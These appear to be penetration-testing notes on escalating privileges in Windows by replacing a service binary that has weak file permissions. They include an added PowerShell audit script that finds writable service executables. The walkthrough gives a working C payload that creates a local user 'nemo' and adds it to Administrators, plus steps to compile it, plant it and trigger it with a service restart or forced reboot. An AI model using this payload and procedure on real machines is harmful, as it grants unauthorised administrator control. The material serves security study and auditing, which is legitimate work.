Insecure File Permissions

  • Most often occurs under Program Files when developers do not lock down the service's files (e.g. permissions granted to EVERYONE), so a low-privileged user can overwrite the binary a service runs as a higher-privileged account

  • Check running services

    • wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"

    • Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

    • tasklist /svc

  • Use icacls to check permissions

    • icacls "C:\Program Files\Path\To\Service.exe"
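
    The service-enumeration and icacls checks above, combined into an added PowerShell audit script that is not part of the original notes. It assumes Windows PowerShell 5.1 or later and that it is run as the low-privileged account whose access you want to assess; the principal list and the rights mask are my choices, not the page's.

```powershell
# Added audit script (not part of the original notes). Lists auto-start services
# whose binary lives outside C:\Windows and flags any executable whose ACL grants
# write, delete, permission-change or ownership rights to broad principals.
# Group memberships other than the ones listed are not resolved; confirm hits with icacls.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                     'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME")
# WriteData | Delete | ChangePermissions | TakeOwnership | GENERIC_ALL | GENERIC_WRITE
$DangerousMask = 0x2 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-ServiceBinaryPath([string]$PathName) {
    # PathName may be quoted ("C:\x y\svc.exe" -arg) or bare (C:\x\svc.exe -arg).
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Find-WritableServiceBinaries {
    $services = Get-CimInstance Win32_Service | Where-Object { $_.StartMode -eq 'Auto' }
    foreach ($svc in $services) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or $exe -like "$env:SystemRoot\*") { continue }
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        $acl = Get-Acl -LiteralPath $exe
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Cast to int so generic rights (e.g. 0x10000000) are tested too
            if (([int]$ace.FileSystemRights -band $DangerousMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $exe
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableServiceBinaries | Format-Table -AutoSize
```

    Each row is a service binary that a broad principal can replace; the RunsAs column shows the account the service would run the replaced file as, which is what makes the weak ACL a privilege escalation rather than a tampering issue.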

  • Create a malicious executable

#include <stdlib.h>

/* Proof-of-concept payload: when the service runs this file in place of its
   real binary (typically as LocalSystem), it creates a local user and adds
   that user to the local Administrators group. */
int main(void)
{
    int i;
    i = system("net user nemo PassyPass123! /add");
    i = system("net localgroup administrators nemo /add");
    return i;
}

  • This creates a user called 'nemo' and adds it to the local Administrators group

  • Compile the code

    • i686-w64-mingw32-gcc adduser.c -o adduser.exe

  • Transfer to victim machine

  • Copy it to the exact path of the writable service executable, using the same file name as the original

  • Attempt to exploit by restarting the service

    • net stop <servicename>

  • If that fails (Access Denied), check whether you are allowed to reboot the machine so the auto-start service restarts

    • shutdown /r /t 0
